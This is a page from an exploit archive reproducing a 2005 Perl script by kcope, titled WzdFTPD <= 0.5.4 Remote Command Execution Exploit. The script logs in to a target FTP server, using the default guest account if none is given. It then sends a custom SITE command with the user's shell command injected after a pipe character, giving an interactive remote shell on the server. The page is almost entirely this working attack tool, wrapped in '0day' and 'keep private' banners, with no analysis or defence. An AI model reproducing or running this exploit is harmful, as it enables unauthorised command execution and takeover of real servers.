[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WzdFTPD <= 0.5.4 Remote Command Execution Exploit
# Published : 2005-09-24
# Author : kcope
# Previous Title : GNU Mailutils imap4d 0.6 (search) Remote Format String Exploit (fbsd)
# Next Title : Mozilla Browsers 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (v2)
######################################################
# 0day0day0day0day0day0day0day
# -------------------------------
# wzdftpd remote exploit by kcope
# nice call to popen(3) on custom
# site commands...
#
# August 2005
# confidential! keep private!
# -------------------------------
# 0day0day0day0day0day0day0day
#
# .___ _____ __ .___
#__ _ __________ __| _// ____/ |_______ __| _/
# / / /___ // __ | __\ ______ / __ |
# / / // /_/ | | | | | | |_> > /_/ |
# /_/ /_____ ____ | |__| |__| | __/____ |
# / / |__| /
#
#__ _ _______ _______ ____ ________
# / / /__ \_ __ _/ __ \___ /
# / / __ | | / ___/ / /
# /_/ (____ /__| ___ >_____
# / / / VER1
######################################################
use Net::FTP;
sub usage {
print "usage: wzdftpdwarez.pl remote_host remote_port user pass custom_site_commandn"
."default guest account for wzdftpd is username/password: guest/%n";
}
print "
wzdftpd remote exploit by kcope
August 2005
confidential! keep private!
";
if ($#ARGV < 4) {
usage();
exit();
}
$host = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$sitecmd = $ARGV[4];
$ftp = Net::FTP->new(Host => $host, Port => $port, Debug => 0)
or die "Cannot connect to $host: $@";
$ftp->login($user, $pass)
or die "Cannot login ", $ftp->message;
print "Now you can type commands, hopefully as r00t!n";
while(1) {
print "!$%&#>";
$cmd=<stdin>;
$ftp->site($sitecmd, "|$cmd;");
print $ftp->message();
}
# www.Syue.com [2005-09-24]